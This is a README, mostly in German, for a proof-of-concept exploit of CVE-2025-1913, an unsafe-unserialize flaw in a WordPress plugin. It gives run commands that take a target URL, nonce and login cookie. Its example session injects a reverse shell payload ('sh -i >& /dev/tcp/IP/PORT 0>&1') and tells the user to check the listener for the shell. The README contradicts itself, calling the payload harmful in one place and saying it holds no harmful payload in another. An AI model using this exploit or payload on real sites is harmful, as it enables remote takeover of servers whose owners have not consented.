
A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research.
Dieses Repository enthält einen rein bildungsorientierten Proof of Concept (PoC) für CVE-2025-1913, erstellt von Suhaib518 🇸🇦. Dieser PoC zeigt, wie speziell präparierte serialisierte PHP-Eingaben anfällige Logik in betroffenen WordPress-Komponenten auslösen können. Der PoC ist sicher und enthält keine schädlichen Payloads.
⚠️ Haftungsausschluss: Dieser PoC dient ausschließlich zu Lern-, Forschungs- und defensiven Sicherheitstests. Verwenden Sie ihn NICHT auf Servern, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Die Schwachstelle besteht aufgrund unsicherer Handhabung von PHP-serialisierten Daten in bestimmten WordPress-Plugin-Workflows. Dieser PoC zeigt, wie ein Angreifer maßgeschneiderte serialisierte Strukturen bereitstellen könnte, die unbeabsichtigtes internes Verhalten verursachen.
Dieses Repository enthält ein Python-Skript, das:
.
├── CVE-2025-1913-PoC.py # Das PoC-Skript, erstellt von Suhaib518 KSA
└── README.md # Dokumentation
Das Skript verwendet nur integrierte Python-Module mit Ausnahme von requests:
pip install requests
python3 exploit.py \
-c "Class" \
-H "https://target.com" \
--wp-nonce "1234567890" \
--cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
Sie werden gefragt:
Das Skript serialisiert diese dann, erstellt eine WordPress-Anfrage und sendet sie ab.
Im Folgenden ein Beispielbefehl, der die Verwendung mit Beispielwerten demonstriert (diese sind nicht bösartig, sie zeigen nur den Vorgang):
python3 exploit.py -c "WP_User_Query" -H "https://example.com" --wp-nonce "89f1a2b3c4" --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
Beispielantworten auf die interaktiven Fragen:
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1
Das Skript gibt dann Folgendes aus:
[*] Sending request…
....Check the listener for the shell.
unserialize() bei nicht vertrauenswürdigen EingabenMIT Lizenz.
Erstellt von Suhaib518 🇸🇦.